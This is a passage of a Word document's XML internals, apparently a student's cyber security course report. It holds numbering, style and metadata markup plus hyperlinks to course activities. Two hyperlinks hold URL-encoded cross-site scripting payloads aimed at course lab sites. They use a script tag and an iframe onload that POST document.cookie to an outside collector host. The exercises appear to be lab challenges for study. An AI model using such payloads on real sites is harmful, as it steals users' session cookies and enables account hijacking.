      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4A403892"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EE9A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900651"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1820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204C81"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="00620D24"/>
    <w:lvl w:ilvl="0" w:tplc="8DEC1D8A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="B6D834E4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="5672CDDC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F52E965E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="33A254CE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D99E284C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="3B3CC32A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D00C13B4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="4CBEA192">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5D4F6D79"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1324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2538EC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0146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6060C3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="45F419B8"/>
    <w:lvl w:ilvl="0" w:tplc="FBAE0B1A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="57BA1166">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="CC30E112">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="ECD40568">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="B666F0C6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="7BFAC4C0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="88AA74AA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="234A28A0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="029445EE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="844052501">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="226889906">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1325090021">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1635788331">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="488137113">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1815373947">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2018921608">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="635112934">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1243491988">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="291253320">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1924870691">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="380979341">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1292243294">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="754382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27966"/>
    <w:rsid w:val="0005311F"/>
    <w:rsid w:val="0006346E"/>
    <w:rsid w:val="000C7667"/>
    <w:rsid w:val="0012036F"/>
    <w:rsid w:val="00157244"/>
    <w:rsid w:val="001811B8"/>
    <w:rsid w:val="001D26B6"/>
    <w:rsid w:val="001E4A1C"/>
    <w:rsid w:val="00235E00"/>
    <w:rsid w:val="002A6D6F"/>
    <w:rsid w:val="002C0ACC"/>
    <w:rsid w:val="002C0EE9"/>
    <w:rsid w:val="00304EF9"/>
    <w:rsid w:val="00316727"/>
    <w:rsid w:val="00362699"/>
    <w:rsid w:val="00383A90"/>
    <w:rsid w:val="003C7717"/>
    <w:rsid w:val="003D406E"/>
    <w:rsid w:val="004814B7"/>
    <w:rsid w:val="004B44E2"/>
    <w:rsid w:val="004C21FE"/>
    <w:rsid w:val="004C57A0"/>
    <w:rsid w:val="00522D6C"/>
    <w:rsid w:val="005741FF"/>
    <w:rsid w:val="005778C4"/>
    <w:rsid w:val="00581E4D"/>
    <w:rsid w:val="0058485E"/>
    <w:rsid w:val="005B1AC6"/>
    <w:rsid w:val="005C2FF5"/>
    <w:rsid w:val="006078CF"/>
    <w:rsid w:val="0061591C"/>
    <w:rsid w:val="00641016"/>
    <w:rsid w:val="0065027B"/>
    <w:rsid w:val="00672D39"/>
    <w:rsid w:val="00692191"/>
    <w:rsid w:val="007137CD"/>
    <w:rsid w:val="00750192"/>
    <w:rsid w:val="00771E18"/>
    <w:rsid w:val="007B4EEE"/>
    <w:rsid w:val="007C11B6"/>
    <w:rsid w:val="007D16EF"/>
    <w:rsid w:val="0082010F"/>
    <w:rsid w:val="008A7EEE"/>
    <w:rsid w:val="008B185B"/>
    <w:rsid w:val="008B2D31"/>
    <w:rsid w:val="008B71B2"/>
    <w:rsid w:val="0091516F"/>
    <w:rsid w:val="00920631"/>
    <w:rsid w:val="009233F5"/>
    <w:rsid w:val="00951788"/>
    <w:rsid w:val="009701CD"/>
    <w:rsid w:val="00986938"/>
    <w:rsid w:val="009B33C4"/>
    <w:rsid w:val="00A16C1F"/>
    <w:rsid w:val="00A87F0A"/>
    <w:rsid w:val="00A944EC"/>
    <w:rsid w:val="00A96BF6"/>
    <w:rsid w:val="00AA3DA4"/>
    <w:rsid w:val="00AD0EB7"/>
    <w:rsid w:val="00B16B5F"/>
    <w:rsid w:val="00B34B2B"/>
    <w:rsid w:val="00B35F2B"/>
    <w:rsid w:val="00B55B3C"/>
    <w:rsid w:val="00B85EAB"/>
    <w:rsid w:val="00BB3293"/>
    <w:rsid w:val="00BF52D7"/>
    <w:rsid w:val="00C675D8"/>
    <w:rsid w:val="00C83133"/>
    <w:rsid w:val="00C83C91"/>
    <w:rsid w:val="00C848C3"/>
    <w:rsid w:val="00CA7CA2"/>
    <w:rsid w:val="00CF0BDD"/>
    <w:rsid w:val="00D352DC"/>
    <w:rsid w:val="00D41B89"/>
    <w:rsid w:val="00D530B5"/>
    <w:rsid w:val="00D83FA9"/>
    <w:rsid w:val="00D847A2"/>
    <w:rsid w:val="00DA39A3"/>
    <w:rsid w:val="00DB23B1"/>
    <w:rsid w:val="00DE0900"/>
    <w:rsid w:val="00DF12FA"/>
    <w:rsid w:val="00E06A01"/>
    <w:rsid w:val="00E34170"/>
    <w:rsid w:val="00E54608"/>
    <w:rsid w:val="00E56414"/>
    <w:rsid w:val="00E6581D"/>
    <w:rsid w:val="00E66BC6"/>
    <w:rsid w:val="00ED3AF1"/>
    <w:rsid w:val="00ED751B"/>
    <w:rsid w:val="00EE4709"/>
    <w:rsid w:val="00EF729C"/>
    <w:rsid w:val="00F36533"/>
    <w:rsid w:val="00F36C04"/>
    <w:rsid w:val="00F41F78"/>
    <w:rsid w:val="00F63085"/>
    <w:rsid w:val="00F83B9E"/>
    <w:rsid w:val="00FB6A76"/>
    <w:rsid w:val="00FF2020"/>
    <w:rsid w:val="00FF4B1F"/>
    <w:rsid w:val="0142DCDE"/>
    <w:rsid w:val="018EE3D7"/>
    <w:rsid w:val="019AD614"/>
    <w:rsid w:val="02E3CFBE"/>
    <w:rsid w:val="03443B3D"/>
    <w:rsid w:val="06B17308"/>
    <w:rsid w:val="0904C9C4"/>
    <w:rsid w:val="0DA0FC93"/>
    <w:rsid w:val="0E2B4E8C"/>
    <w:rsid w:val="0E407A08"/>
    <w:rsid w:val="0F3AFA8F"/>
    <w:rsid w:val="1098DFCA"/>
    <w:rsid w:val="12997F7D"/>
    <w:rsid w:val="13D4C4C5"/>
    <w:rsid w:val="14E6EADD"/>
    <w:rsid w:val="1503DF44"/>
    <w:rsid w:val="155554D3"/>
    <w:rsid w:val="15928116"/>
    <w:rsid w:val="15D4996E"/>
    <w:rsid w:val="167A1920"/>
    <w:rsid w:val="169D7522"/>
    <w:rsid w:val="181B8E52"/>
    <w:rsid w:val="186127A6"/>
    <w:rsid w:val="195DD59F"/>
    <w:rsid w:val="1AE53E51"/>
    <w:rsid w:val="1B35AEF7"/>
    <w:rsid w:val="1B8583FD"/>
    <w:rsid w:val="1C43A36D"/>
    <w:rsid w:val="1C8EE1DB"/>
    <w:rsid w:val="1CC00C75"/>
    <w:rsid w:val="1D136FCE"/>
    <w:rsid w:val="1FE2BA0C"/>
    <w:rsid w:val="20427107"/>
    <w:rsid w:val="21633C8C"/>
    <w:rsid w:val="21A91BA0"/>
    <w:rsid w:val="29C051EC"/>
    <w:rsid w:val="2ACF105E"/>
    <w:rsid w:val="2B194D2C"/>
    <w:rsid w:val="2B29D56B"/>
    <w:rsid w:val="2C039CBC"/>
    <w:rsid w:val="2C2B811B"/>
    <w:rsid w:val="2C4FC874"/>
    <w:rsid w:val="2CF98C07"/>
    <w:rsid w:val="2D6900C1"/>
    <w:rsid w:val="2DB330CD"/>
    <w:rsid w:val="2E6E7AC1"/>
    <w:rsid w:val="2F3A1CC1"/>
    <w:rsid w:val="30B419A8"/>
    <w:rsid w:val="30DB412C"/>
    <w:rsid w:val="30F1F342"/>
    <w:rsid w:val="31BE966E"/>
    <w:rsid w:val="336AB2E5"/>
    <w:rsid w:val="371C62D3"/>
    <w:rsid w:val="3730D899"/>
    <w:rsid w:val="382CF1D2"/>
    <w:rsid w:val="391D54D3"/>
    <w:rsid w:val="39809BE9"/>
    <w:rsid w:val="398470B6"/>
    <w:rsid w:val="3B3B092D"/>
    <w:rsid w:val="3C56E03E"/>
    <w:rsid w:val="3D9C83D4"/>
    <w:rsid w:val="3D9D0607"/>
    <w:rsid w:val="3F2B0098"/>
    <w:rsid w:val="3F828AD0"/>
    <w:rsid w:val="4069D393"/>
    <w:rsid w:val="41548045"/>
    <w:rsid w:val="42A57885"/>
    <w:rsid w:val="43A14A5A"/>
    <w:rsid w:val="44908FCC"/>
    <w:rsid w:val="4517F57F"/>
    <w:rsid w:val="45ACF387"/>
    <w:rsid w:val="4616B9A0"/>
    <w:rsid w:val="4657ADB4"/>
    <w:rsid w:val="46FCCB50"/>
    <w:rsid w:val="4754C4D8"/>
    <w:rsid w:val="4A6EB47B"/>
    <w:rsid w:val="4C7EF474"/>
    <w:rsid w:val="4C8FA85B"/>
    <w:rsid w:val="50317446"/>
    <w:rsid w:val="5072935B"/>
    <w:rsid w:val="50D93E6F"/>
    <w:rsid w:val="51A4F042"/>
    <w:rsid w:val="52A3F398"/>
    <w:rsid w:val="53ACB0B5"/>
    <w:rsid w:val="543CD94A"/>
    <w:rsid w:val="55216E6C"/>
    <w:rsid w:val="55390D8F"/>
    <w:rsid w:val="5557D4A9"/>
    <w:rsid w:val="5590C850"/>
    <w:rsid w:val="55D0B4D2"/>
    <w:rsid w:val="566E02A6"/>
    <w:rsid w:val="592CA103"/>
    <w:rsid w:val="5980147F"/>
    <w:rsid w:val="59BFA03D"/>
    <w:rsid w:val="5AF8CDE6"/>
    <w:rsid w:val="5B627D9A"/>
    <w:rsid w:val="5ED7D080"/>
    <w:rsid w:val="5F245F19"/>
    <w:rsid w:val="60E4267D"/>
    <w:rsid w:val="61EF3C9A"/>
    <w:rsid w:val="62319522"/>
    <w:rsid w:val="6253BB17"/>
    <w:rsid w:val="6265B322"/>
    <w:rsid w:val="62CCBAE5"/>
    <w:rsid w:val="6513D53F"/>
    <w:rsid w:val="66F26DFD"/>
    <w:rsid w:val="68CB2D18"/>
    <w:rsid w:val="6AF0240F"/>
    <w:rsid w:val="6B214FDA"/>
    <w:rsid w:val="6C805450"/>
    <w:rsid w:val="6C9EE7D8"/>
    <w:rsid w:val="6D397BBD"/>
    <w:rsid w:val="6E78A25E"/>
    <w:rsid w:val="6E9B7AC1"/>
    <w:rsid w:val="703CBDFD"/>
    <w:rsid w:val="714DC6FA"/>
    <w:rsid w:val="72655377"/>
    <w:rsid w:val="765397A8"/>
    <w:rsid w:val="78017889"/>
    <w:rsid w:val="7B3DB262"/>
    <w:rsid w:val="7B7E572D"/>
    <w:rsid w:val="7BD61530"/>
    <w:rsid w:val="7BD990C2"/>
    <w:rsid w:val="7CF86664"/>
    <w:rsid w:val="7D1EA43D"/>
    <w:rsid w:val="7DC3C52F"/>
    <w:rsid w:val="7DEE4269"/>
    <w:rsid w:val="7E62B2A7"/>
    <w:rsid w:val="7FDD0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link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="003D406E"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="27"/>
      <w:szCs w:val="27"/>
      <w:lang w:val="en-AU" w:eastAsia="en-AU"/>
      <w14:ligatures w14:val="standardContextual"/>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3ACB0B5"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="53ACB0B5"/>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5741FF"/>
    <w:rPr>
      <w:color w:val="96607D" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="003D406E"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="27"/>
      <w:szCs w:val="27"/>
      <w:lang w:val="en-AU" w:eastAsia="en-AU"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DB23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8878355">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penlearning.com/unswcourses/courses/cyber-security-engineering-2026-t2/activities/classicalciphers"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xss4.comp6841.xyz/search?q=%3Ciframe+src%3D%22%2F%22+onload%3D%22fetch%28%27https%3A%2F%2Fhkdk.events%2F6j8hbch8dxbs8m%27%2C+%7Bmethod%3A+%27POST%27%2C+body%3A+encodeURIComponent%28document.cookie%29%7D%29%22%3E%3C%2Fiframe%3E" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.openlearning.com/unswcourses/courses/cyber-security-engineering-2026-t2/securityeverywhere/week-2-security-everywhere/?cl=1" TargetMode="Externa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tfd.comp6841.xyz/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xss2.comp6841.xyz/search?q=%3Cscript%3Efetch%28%27https%3A%2F%2Fhkdk.events%2F6j8hbch8dxbs8m%27%2C+%7Bmethod%3A+%27POST%27%2C+body%3A+encodeURIComponent%28document.cookie%29%7D%29%3C%2Fscript%3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openlearning.com/unswcourses/courses/cyber-security-engineering-2026-t2/activities/comp-selecting-your-project/?cl=1https://www.openlearning.com/unswcourses/courses/cyber-security-engineering-2026-t2/activities/comp-selecting-your-project/?cl=1"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hyperlink" Target="https://www.openlearning.com/unswcourses/courses/cyber-security-engineering-2026-t2/activities/nsa-game" TargetMode="Externa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hyperlink" Target="https://www.smh.com.au/politics/federal/national-security-risk-as-parliamentary-network-fails-seven-out-of-eight-basic-cyber-checks-20260611-p6061j.html" TargetMode="Externa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hyperlink" Target="https://www.openlearning.com/unswcourses/courses/cyber-security-engineering-2026-t2/casestudies/week-2-doors/?cl=1" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.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681</TotalTime>
  <Pages>13</Pages>
  <Words>1802</Words>
  <Characters>9572</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>281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87</cp:revision>
  <cp:lastPrinted>2026-06-15T05:36:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-28T06:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-15T05:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>